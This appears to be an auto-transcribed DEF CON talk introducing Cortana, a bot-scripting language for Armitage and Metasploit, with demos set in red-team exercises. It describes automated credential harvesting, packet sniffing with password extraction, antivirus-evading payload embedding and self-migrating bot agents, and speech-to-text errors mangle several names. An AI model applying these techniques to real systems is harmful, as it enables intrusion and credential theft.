 So, I'm not sure if this has ever happened at DEF CON before, but our speaker has, hasn't completely lost his voice, but it's a little rough today, so keep that in mind, but our next speaker here is Raphael Mudd. Thank you. I'm not that worried about losing my voice. I look at this room and I see a lot of my close friends, and I just feel like I'm amongst family, so I'm really looking forward to sharing something I've been working on for a while with you, and thank you for being here. What I'd like to start out with is how many of you have used IRC before? Excellent. How many of you have written IRC scripts before? Oh, my kind of people. Now, I'd like to ask how many of you have written or used the IRC war scripts back in the 90s? Yeah, I'm 32 years old now, and I feel like I've regressed to 14. I'm making hacking tools, and I'm making hacking tools that feel like the IRC stuff I did in the 90s, and I'm trying to make my hacking tools more like the IRC tools I had in the 90s, so we're going to talk about that today, and we're going to talk about something called Cortana. What Cortana is, well, first off, how many of you know Armitage? Okay, great. Cortana is a scripting language for Armitage. I'm actually trying to make Armitage scriptable so you can actually add features to it, write bots. Here are the things we're going to talk about. Really important. I'm really honored by this. This work was made possible through DARPA's cyber fast-track program, so thank you, Mudge. I really greatly believe in your vision and what you're doing with that, and thank you for letting me be a beneficiary of that, and I hope you guys like what I've put together. Here's what this talk is not. Cortana is a programming language that does a lot of stuff, so this is not a tutorial, and some of the features I'm just not going to cover. But what I want to do today is I want to demonstrate what it can do. Okay, we're going to have a lot of fun. I'm going to cover some of the major high notes and why they're there, and my goals, I just hope you, after this, are encouraged to go out and try it. I look forward to seeing what you do. A little bit about me. I started out IRC in the 90s. I wrote an IRC client called JRC2. I know Dan is in the audience, he's a JRC2 fan. I'm also the developer of a programming language called Sleep. I wrote it in 2002, and it was very active until 2009. I'm also a developer of Armitage, and because the work I've done the past years has kind of taken over my professional life, I started a company, actually my personal and professional life, it's, I won't lie. I started a company this year, Strategic Cyber, and make software for red teams, occasionally do research. I can learn about that at advancedpentest.com. This is from my IRC clients in Easter Egg, but it's from an MRC ad on it that was published in the 90s to make fun of me, just to kind of give you an idea of the world I came from. We're sitting on a channel called Floods, and my nickname's Butane, and I'm sitting there talking about how to write these scripts to revolutionize MRC, and that's not what I really said, but it's probably what I sounded like, so I deserved it. But this is kind of the world I came from and what I want to bring back into our community a little bit. I mentioned my IRC client, JRC2. I have experience making something scriptable. JRC2 never became very popular. There's a lot of really good IRC clients out there, but it did attract a really healthy little scripting community. I think it's over 70 or 80 scripts on its website, and some of them tens of lines of code, others, thousands written by people who've actually never even programmed before, and I noticed in the security community there's a lot of people afraid to take the plunge into writing code, and so I wanted to create something where people who haven't programmed before have a friendly path to develop something useful, share it with others, and hopefully get hooked on the bug of programming, so that's part of my motivation here. Let's talk a little bit about sleep. As I mentioned, I started working on sleep 2002. I didn't know I was actually going to continue working on it. It was a weekend long hack. It looks a little bit like Pearl. It is built on top of Java. It doesn't have any external dependencies. I like that. It's very small. It's one file, 250 kilobytes. The nice thing about sleep and my original purpose behind it was to make a base language, okay, that I could extend with new constructs to make the language really friendly to whatever purpose I wanted. Of course, my first round of that was a chat program, and I thought it worked really well there. With all things, I document everything. So sleep has a nice 200 page manual, but the same thing is available online for free and always has been, probably always will be. So this was a labor of love, if anything. So you're going to see some sleep code today. Don't worry, it's not too bad. And you can learn more about sleep at sleep.dash9.org. Now let's talk about arm titch. You know, some really nice folks at Starbucks let us cut in line, and when they heard what was happening, they actually bought the tea and the honey. It was really nice of them. So let me continue on with arm titch. Arm titch, for those of you who don't know it, seems like most of the room does. It's a graphical user interface for Metasploit. And it's gone pretty far in the past year and a half. It's been out, and I've been really pleased with it. Most people know it as a GUI, I think of it as a red team collaboration tool. And what's possible with Arm titch is I can set up a team server that wraps Metasploit and makes it safe for multiple people to use at the same time. And using that central team server, a whole team can actually break into a network, work through one foothold, pivot through it, and share the same accesses and the same data. It's really cool. I've taken it to a lot of exercises and I speak about it pretty regularly. So there's a lot of material online about that. Now let's talk about Cortana, because we've got this ability for humans to interact with each other, right? Well, the question with Cortana was what happens when I add bots into the mix? And so created the scripting language based on sleep to automate the Metasploit framework and to extend the arm titch with new features, just like the IRC clients, the active scripting communities did in the 90s. Why do we want to do this? Well, one, if you've got bots, you can delegate work to them and you can scale your red team activities. We'll talk about that. The reason for scripting arm titch, I feel like as a community, we have a wealth of great standalone capabilities. I mean, we are a very, very wealthy community in terms of capability, but there's not a lot of glue out there. And I like the Metasploit framework. It's made a lot of inroads, but there's nothing there for adding a user interface on top of it and extending that. So that's why I want to make arm titch scriptable. Here's kind of how it works. It's possible to load Cortana scripts into arm titch. I had to come up with an extension, something that said cyber, something that said Cortana. So I went with CNA. Good acronym. But it's possible to load multiple scripts into arm titch. Standalone or with a team server, you can do that. And Cortana itself exists as a standalone interpreter. Okay. And I can load as many scripts as I want into this headless standalone container for bots. And one of the things the language enforces is isolation between each of the bots. So you don't have to worry about this other script that's loaded and de-conflicting with it. This is all built into the language. Lessons learned from my past experience doing this. Now, I've described Cortana so far in context of like IRC bots and scriptable IRC clients. Well, really the academic way of describing it is I see the combination of arm titch and its team server, the MetaSplay framework and now Cortana as pieces in a multi-agent system for red team operations. And so Cortana is the domain-specific language to write agents that do whatever we want them to do, respond to things that happen. The team server provides the communication layer and the de-confliction of the agents. MetaSplay offers an agreed upon vocabulary for our data. And if anybody here has ever built a multi-agent system in a committee, you'll know that that is something that will never get done in the project will stall for years. The other nice thing about the MetaSplay framework is all of its modules are great verbs, actions for these simulated humans, these bots to do, things they can do, and there's a lot of capability there. And of course Cortana gives us the ability to take any of those verbs, do something with them. Cortana gives us the ability to, when something happens, react to it, just like in writing an IRC bot, when, hey, when there's a new message in the chat room, do this. When Cortana, it's, hey, when I see a new host, do this, or when a compromised host, a session opens up, do this. And one of the challenges, though, in this kind of system is positive control. And so it's not so much the topic of this talk, but a lot of the reason this was a dark effort was to actually research those issues and come up with a few simple ideas and try them out for assuring positive control to debug, understand and reign in these agents, keep them from taking over the world. If you've ever read the book Damon, my goal is kind of make a system that would enable somebody crazy to do that. Okay, well, Cortana is not the only way to automate the Mesplate framework. First, you do have the option of extending it and Cortana is not a replacement for that at all. You should still write your modules if you've got a new exploit. You should still write auxiliary modules. Plugins are a great way to extend the framework with new commands, and resource files are still a great batch capability. The Mesplate RPC server, probably one of like two or three people in the world who work with it the most, and it's really low level, so you can build something on it, but you're going to be reinventing a lot of what I've already done. But I do like it because it's well thought out and I want just really basic primitives so I can build what I've done, so. And of course there's MSL CLI, which is a command line interface to the Mesplate framework, and that's good for maybe embedding to a script, but this is different in the sense that we're writing these bots that are long running and we can extend our amortage. Now let's go into some uses. First I want to give you some background. I've mentioned that Cortana can respond events as they happen, okay? And here's how that works and what it looks like. In Cortana the syntax to say I want to respond to events is this, on some event, whatever it is, I give back a bunch of arguments and I can respond. That's it. I can declare as many of these as I want and that's how you respond to an event listener. By the way what I'm going to show throughout this talk though is what I call the declarative syntax, meaning I'm just telling the program what I want, but there's actually a syntax where you can hook an arbitrary event and give it an arbitrary function, like so there's kind of a power user equivalent, but this is the easier to read one. Here's the way a lot of events are driven. For example, Cortana is constantly pulling the Metasploit framework, the database it uses and it's pulling back all the tables. And there's actually a really efficient protocol where when Cortana says hey I want new data, I want to know what you've got, here's a hash of what I've got. It'll send that when it requests an update and if the server says hey the data hasn't changed, it'll say oh okay and nothing's transmitted so it's very efficient. And the way it works is I have the old data and I have the new data and I compare the two and I say hey in the case of host, I say okay hey from the old data to the new data some of this stuff's missing, well I fire a host remove event that scripts can respond to, or I say hey I see a new host. I'm gonna fire a host add event and what that gives me the ability to do is take anything that is part of this working set of data available in the Metasploit framework and it gives me the ability to respond to it in a very easy, intuitive way. And I'm already doing all this data synchronization anyway so this is kind of a free on top of what we already have. Here are the data events that Cortana fires events for the Metasploit credentials table, hosts, lutes, the routes, what pivots you set up, which services are seen, can actually declare an event for example on service add 22 and see when the Metasploit framework becomes aware of a new system with SSH open. And it doesn't matter how it figured that out, maybe somebody launched a module and found it, maybe somebody imported it. And of course I can fire events surrounding sessions as well. Now a little story, okay. So I was at the Northeast collegiate cyber defense competition this year. I've done it every year since 2008. I really love the event and what it is, it's a exercise where college students come with their team, they're dropped in the middle, they have a network to manage and run while a red team is stomping on them the whole time. This year we had a problem. There was a new organizers and they decided to give the students all patched systems. And I guess they said the XP image that was vulnerable, something went wrong with it so they swapped it out for a new Ubuntu image. Thanks. You mean expect me to come to these events and hack? So anyways, the students have all patched systems, right? And on top of that, the organizers decided to fire while the red team off from the competition for the first hour, okay? So not only did we not have a possible exploit vector, we couldn't use default creds either. Although funny enough, even after the hour or two teams, we still got them with PS exec and default credentials. So if you ever play in these events, change those passwords quickly. But as you can tell, you got 10 people and they're like, well, what do we do? And a friend of mine, Jolly, he asked, he's like, hey, is there a way to, I don't know, when Chris does an Nmap scan, is there a way like we can see what changed and just get that out to the room? And I said, yeah, I think that's possible. I think I can write a bot for you. He's like, oh, okay, cool. And Chris, he's a guy who's doing an Nmap and changing his IP constantly and just scanning the student systems. Chris, he's like, Raph, I'm like, yeah, Chris. He's like, your little bot's kind of cool, but I don't want to import an Nmap scan every minute. And I'm like, oh, I understand. Can you automate it? Sure. So I wrote a bot for Chris to automate, running from his system to automatically import his Nmap scans every time they finished. Okay, the ones he was doing on his system. And then my friend Silas says, hey, Raph, I've got a script. I give it a bunch of IPs and it'll start launching just a bunch of normal, you know, the run of the mill exploits. Your bots, can you give me a bot that feeds that? Sure. And so we ended up by accident with a system where I'm running a bot that announces changes to the database, new host, new services. Chris is running a bot that imports stuff and Silas is running a bot that responds to that data to new hosts and things that become available and launches a bunch of attacks from his system. So I didn't expect that. It was kind of cool. It was like this distributed system of hacking going on, being fed by this central red team collaboration architecture. And what you can see in this picture, much better than I can see on my laptop, is the Rafi Cortana bot actually announcing hosts. If there's a cameraman, I'm sorry, I like to move around. And I just have to show this. This is a, I thought it was a momentous occasion. This is Chris editing his NMAP importer bot. And I'm like, oh, Chris, you're the first Cortana programmer besides me. By the way, you wanna know who the second one is? There's a student from Land O'Lakes University found the Cortana code and package in a hidden directory on my web server like a month ago when he's been playing with it since and emailing me. By the way, I just laughed. I thought it was great and so I forgot his name, but I just props to him. I thought that was pretty cool. So I guess he would be the second one. So let's go ahead and do a demo. There's a lot of demos in this talk, by the way. Okay, here I am. I've got Armitage. I have a pivot set up and I've got an exploited host, okay? And earlier, I gotta admit that T really helps. My voice is much better than I thought it would be. Okay, earlier, I started the red team server and my Armitage client is connected to it. So let's first start up Cortana with this differ bot and I'll show you what it looks like. This is the entire differ bot on service ad, say, hey, I see this host, this port and the banner information for that particular service if we have it. That's not too hard, is it? A nice thing is for people who are novice programmers, they like to copy and paste stuff. So there's no object-oriented hierarchy in this. It's pretty much everything you use. You can copy and paste in a work elsewhere. So very novice-friendly in that sense. So yeah, this is that whole bot. I'll just change it to convince you. Not faking my demo. There we go. Now let's run Cortana headless. Here's how I do that. First, I need a property file. And what I wanna point out is that there is documentation on Cortana, enough to nearly be a book, about 55 pages. So afterwards, you won't have any problem digging into it in these pictures. But what you have to do is first create a property file and say, hey, here's how I want my bot to connect. And then to run it, all you do is Java dash jar, Cortana dot jar, defcon dot prop, and give it the path to your bots, okay? So let me go ahead and run that. By the way, I can specify as many bots as I want and they'll just all load up. And once I do that, you'll see it in Armitage as well, but Cortana has a console for actually interacting with scripts and working with them and playing with that positive control stuff. Both the Armitage and standalone version have the same commands in the console. Thank you, I just caught that. I heard you can't see the whole screen. I did not come here to cheat you guys out of screen space, I promise. Some people are happy to have me talk less, so let's do something I didn't practice because I love doing that. Remember I mentioned that we have all these tools to understand our agents? Well, kind of, one of the tools is, it's a tracer. So I'm gonna type tron, differed out CNA. Got other great commands like prof and pron. I love turning something into DARPA. I'm gonna be like, hey guys, check out the pron command in my hacker tool. So let's go ahead and import something. And we can see, by the way, here we are in the event log for a team server. I'm gonna see our bot joined. Go to host, import hosts. Hopefully it's the right file I just imported. And we'll see. So unless I scan that box already. All right, I'm gonna just make sure there's no services here. I'll just scan this guy. Cause I imported with this one already. So there we go and come back and start announcing stuff to our chat room. There we go. Saying, hey, I see this, I see that. And that was the differed script and how it worked. By the way, there's more to this story. So let me take you there. As soon as I fix my, there we go, it's better. So what was the game? Remember, I told you at Northeast CCDC, we ended up in a hard situation, right? Because we had this, we started seeing stuff. A couple hours later, we see a system pop up in a banner and it said Zimbra. What's Zimbra? So Google it, get the default creds and log into it. And we were able to jump on the system that students had just put up before they had a chance to change the passwords. And that's because we had a bot helping us. Another example, we saw Apache Tomcat come up. And my friend Will, who works at Rapid 7, his pentester there, he was like, ooh, Tomcat. So he managed to get into that system before the students had a chance to lock it down. And so just having this situational awareness aided by bots was really, really valuable to us. Another story is who here has used Windows Credential Editor before? A few of you. It's a really awesome tool, you should Google it. Probably while I'm talking right now, it's really that cool. What it does is it pulls plain text credentials out of memory for the user it's logged in. And I wrote a bot for some other events that would, every 10 minutes, sweep through all the hosts we had access to, run this tool, parse its output, and make the passwords and usernames available to our whole team. So another example, bots is helping with the tedious work. So let's talk a little bit about post-exploitation. Basically, I want to control sessions with multiple people using them. And the Armaged Team Server makes it possible for humans, so it's pretty trivial to extend to bots as well. Here's what it looks like. IQ a command using a function like M underscore command with the ID of the session. And when that command completes, an event fires in my local instance. So somebody else queues a command that won't fire an event. But I get this event onMeterpeter underscore that command and I can parse it and do whatever I need to with it. Also, more generic onMeterpeter fires too, so I can hook kind of anything in my local script that fired. And one other thing to say to this, for larger scripts, there is the ability to create kind of like isolated agents from inside of one script that all just do their own thing and that's a really great way to decompose a larger program. Interacting with a process through Meterpeter. Again, same thing, M exec session ID command. I get back an event on exec underscore command so I can do M exec session one, dir slash s star colon dot pdf or something like that. And when that finishes, I'll get all that information back and I can parse through it. There's also M exec local, which takes a local executable, gives it over to Meterpeter to inject directly into memory without touching disk and work in the same way, so it's pretty cool. Shell sessions. When I was first building this technology, I got this one all wrong. I couldn't interact with a dumb command shell in the same way I'd interact with Meterpeter but then I came up with something that just didn't work, was really confusing to work with. So I then said, no matter what I do I gotta make this look like Meterpeter so now it does. Shell command, some session ID, whatever command you want and you get back on shell underscore command, same kind of thing. So this pattern applies to whatever you're trying to interact with. Now let's have another demo. We'll load this into our bot. Oh, by the way, remember I mentioned the tracing? This is the output of all the stuff our one bot was doing behind the scenes. We'll turn that off, you don't need that. Okay, but you can see all the functions that were called, what they returned and what file and what line number. Nice debugging tool. So let's go ahead and load another bot. It's DefCon, AutoKill, I think it was AutoKill.CNA. There we go, good. I can actually load and unload bots too from Cortone instance. So let's have a look at the AutoKill bot. Here's what AutoKill does. In this case, every five seconds it looks at all of our sessions and makes sure that they're Windows Meterpeter and that they're ready for interaction and it sends a command PS. We get back an event on Meterpeter PS and we use a built-in Cortona function to parse that into a dictionary it can work with and for each process entry, I extract the name process ID. I check if internet explorer is that process and if it is, I queue the kill command. So let's take a look at that. First thing I'm gonna do, we're gonna use another Cortona debugging function which is the logging one, so we're gonna do logon, autokill.CNA and now we can see everything Cortona is doing on our behalf, which file, what line number. A great tool for understanding a script without tracing every function. So let's go over here to my XP victim I've got. I don't know, I'm kind of in the mood, browse the web, see what's on the internet, see what's on MSN.com today. And, thanks. Could you imagine like a cyber defense exercise doing this with like star setup, star or star wire shark star and star CMD star? Same thing though, here you go. There's our kill commands that are being issued by our bot on our behalf. Like turn that off. Tell our bot bye-bye now. That's an example of kind of post exploitation. There are bot left, bye-bot, I miss you. And this is just a screenshot of, I mentioned the Windows credential editor stuff. This is from the Rochester Institute of Technology Information Security Talent Search, an offense and defense competition and really great, if you can go out there, I recommend it. But here this is running Windows credential editor and announcing it to the chat room so you can see some passwords up there. Not my password thankfully. Okay, let's see here. Now, let's talk about scripting armitage a little bit. Through Cortana, it's possible to take the default behaviors in armitage and change them. So, here's the problem. Armitage is an opinionated tool. The developer is an opinionated tool too. And I wanna be able to alter how it does things. I as a scripter. For example, armitage picks my payload. Wouldn't it be nice if I could change how that works? Or here's a really good one. When I'm doing a pen test, if I try to PS exec to a system doing a pass the hash attack and I rely on the default binary generated by the open source medisplate framework, I'm gonna get flagged by antivirus. So what if I wanna hook the workflow in armitage for passing the hash and use a different executable? How could I do that? And just how can I modify armitage? So let's take a look at that. The mechanism to do this kind of, these kinds of things are filters. Filters hook an action that a script wants to take and it changes the parameters on the fly, can inspect it and change it and then it goes through like nothing ever happened. And so let's have a look at that. Here I am back in all this nifty stuff. And let's take a look at a script called payload.cna. cd defcon. I'm kinda messy in my folders, so don't mind me. Here's a script to, what it does is when the onReady events fired me, hey I'm synced with the medisplate framework database, it starts a handler for windows interpreter reverse HTTP. And whenever a user launches a module through like the armitage GUI, it looks at the options, it looks at the payload, says hey, is this windows interpreter reverse TCP? If it is, let's modify that, change it to HTTP, put in the information it needs and let it continue going. So let's take a quick look at that. So we're gonna go to, there's two ways to load a script in armitage. If you want it to always be there, go to armitage scripts and load and unload stuff and go to town. If you're a developer, go to view, script console and you get that same console we saw in the command line. Little nicer though, cause it has tab completion. So I'm gonna load armitage, defcon, payload, payload.cna. There you go, started the multi handler for us. I feel you, see that. So let's go ahead and launch an exploit against the system. You know what's really exciting? Do the classic MSO867, some feeling lazy. And we'll tell it to a user reverse connection, press launch. And what you see is here's our payload, windows interpreter reverse HTTP, right? I'll see if my pivot wants to behave or if the system wants to behave and it actually triggers. Main thing I wanted you to see though is the actual, which I'm gonna call it, the actual payload change. So somehow my 2003 box doesn't want to be exploited right now. It's okay. I know a way around that. If not, if this doesn't work, then I'm gonna just press. Oh, I didn't make a reverse, but for my next demo, I actually need to be on that box. So we'll let that go. But that's a pretty simple example, right? Swapping a payload preference. What about, what about the PSExec example I mentioned? Here's a little bit more complex script that I'm working on. And I guess I'm still working on converting it from something else I used to have. But what it does, filter user launch, if the module's PSExec, if the payload's a bind payload, it generates the raw shell code for a payload that matches that. And it uses a sleep function I wrote to embed that shell code, not obfuscate it, inside of an executable I have that beats most antivirus. Okay? So this is an example of how I can take and use Cortana to merge my secret sauce for a pen test into the workflow in Armitage without really changing anything from the user's perspective. And that's a really, really powerful thing because if you've got other things you want to integrate, other kinds of callback agents, other kinds of possibly even sessions besides meturpator, I'm exploring a lot of this stuff right now. It's a lot of fun, so a lot of potential here. Now let's talk about user interface here as we start to wind down the presentation. This is all about how do we add features to Armitage, integrating third-party tools, exposing capabilities in the framework that aren't normally used, or even just controlling something built in Cortana. Well, here's the things Cortana scripts can do to extend Armitage. They got it. They can define keyboard shortcuts. They can define menus. They can create console interfaces, so pop up a tab and you have full control over it. And they can create tables of information. And that's kind of what Armitage does for everything. So actually how I evaluated this technology is I delivered to DARPA Armitage written in Cortana. Like I ripped everything out and rewrote all of it with just this stuff to show it could be done. And I thought it was going to be easier than it was. It was doable, but it was actually kind of hard and I was like, it was a busy time when I did that. That was a good test. So let's have a demo. How many of you know that Metropeter can sniff packets? Which is a few hands went up, great. Yeah, Metropeter has a Sniffer module built in. It's a little cumbersome to use, but it is there, it's a pretty cool capability. So let's go ahead and load a Cortana script that lets us use it. First, if I right click on this host, I've got a Metropeter menu, right? And you can see all the things I can do right now. Now let's go ahead and load Sniffer.CNA. Sniffer, Sniffer.CNA. Great, I now have a Sniffer. If I right click on this host, go to Metropeter, I now have a Sniffer menu. Everybody loves Snifers. I'm going to press start. And what it's going to do is go to that host, query all the different network interfaces on it, and it'll pop up a dialog asking me which interface I want to sniff on. I'm like, oh, okay. I'll sniff on this one, I guess I don't really have a choice, do I? So let me press sniff, start Sniffer. And anybody notice what the script did? Add a little nose to indicate that we're sniffing. Scripts have a lot of power. Now, let's go do something on my victim system. Let's, FTP, one, two, three, two, one, six, four, eight, one, two, eight, and I'll do, I don't know, log in as a user voice, got my password, fine. Oopsies. By the way, I can still do that logging stuff I told you about, see what it's doing on my behalf. Because periodically the Sniffer's pulling back packets for me and saving them somewhere I can get to them. So let's go over here. Part of the power of the Metasplay framework is not individual features, but the fact that they work well together when combined. It's like magic the gathering. So a great module in Metasplay is called P Snuffle. And what P Snuffle does, it can take an arbitrary PCAP capture, extract plain text creds out of it, just like DSNF used to do, and put those in the Metasplay credentials database. So let me go Sniffer, P Snuffle. And here it's running the module for me. And you can see my FTP login I just tried. So that's an example of a Cortana script adding a new feature and exposing the really cool stuff we can do with it in the Metasplay framework. So let's take a look at that script real quick. Here it is. First, I'm declaring a pop-up, a menu in the Meturpator. Bottom is the hook. Menu Sniffer, item start. When it's clicked, it does this stuff. I queued this info a few times to give you Sniffer time to load. Once Sniffer interfaces comes back, it's gonna fire an event on Meturpator Sniffer interfaces. And I'm gonna parse through all this, prompt you with all that information, and once you hit sniff, it's gonna fire an item selected event. I'm gonna issue a Sniffer start command to that Meturpator session. Pop up a message, Sniffer started. And every 10 seconds, I'm gonna loop through all the sessions that I know are sniffing and run the Sniffer dump command for you in the background. And by the way, a filter on the icon, here's what it looks like. This host image filter intercepts when armtage is about to display an icon. And it's like a pancake, or no, sandwich is better way to guess, describe it. And what it does is, it's a bunch of images that just gets layered together and resized. So what this filter does is gives me a chance to interact with that layer, that sandwich of images and change them. So I loop through all the sessions, I'll relate to that host, check if any of them are sniffing, and if they are, I push an image onto that sandwich, onto that array, a sniff dot ping. And that's it, that's how I add my little nose. So that's the Sniffer script. So to kind of take this on, wrap it up a little bit, what is Cortana? It's a scripting language to write bots for an armtage collaboration team and automate them as a framework. It's a scripting language to extend armtage. One more thing, this is kind of evil. This function up here, something sleep can do. It's an inline function, meaning when it executes, it runs in the context of its parent. And what it does is it pauses the current function, the parent, and sends it to another function, the current function, the parent, as an object, as a parameter. And it connects to some server elsewhere, writes this pause function out to the socket, and closes everything down. This is a way that your Cortana agents can migrate to other attack servers to build a very scary distributed botnet. And... If you want to check more about this twist, I've got two articles I've written about this technique, shell scripting with a distributed twist and agent-based traffic generation. So just to wrap this up, I introduced Cortana to you. We talked about how to build distributed bots, talked about post-exploitation, how to modify how armtage does things, and how to extend the user interface with new features. Again, I would especially just foot stomp, like to say thank you to DARPA and the wonderful things going on with the cyber fast track program, just fantastic opportunity. That's what made this work possible. And here's where to go next. I'm Armtage Hacker on Twitter. There's my email. You can learn more about sleep. If you go to fastneasyhacking.com slash download, or if you go to that website and click the download link, Cortana, the documentation, some of these examples are there. And I'm gonna clean all of it up and merge it probably this weekend into what's in Metasploits. So thank you very much, and I'll turn it over to questions.